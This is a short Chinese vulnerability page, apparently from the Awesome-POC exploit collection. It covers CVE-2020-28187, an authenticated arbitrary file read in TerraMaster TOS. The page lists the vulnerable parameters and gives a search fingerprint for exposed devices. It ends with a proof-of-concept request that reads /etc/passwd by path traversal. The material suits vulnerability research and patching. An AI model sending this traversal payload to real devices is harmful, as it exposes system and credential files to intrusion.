admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 11:58:05 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/TerraMaster TOS 后台任意文件读取漏洞 CVE-2020-28187.md
Threekiii 772a085cfa 更新漏洞
2023-08-28 15:55:36 +08:00

662 B
Raw Blame History

TerraMaster TOS 后台任意文件读取漏洞 CVE-2020-28187

漏洞描述

TerraMaster TOS <= 4.2.06中的多个目录遍历漏洞允许远程身份验证的攻击者通过/tos/index.php?editor/fileGet路径下的filename参数、 /include/ajax/logtable.php路径下的Event参数和/include/core/index.php路径下的opt参数读取文件系统中的任何文件。

漏洞影响

TerraMaster TOS < 4.2.06

网络测绘

"TerraMaster" && header="TOS"

漏洞复现

登陆后访问验证漏洞的POC为

/tos/index.php?editor/fileGet&filename=../../../../../../etc/passwd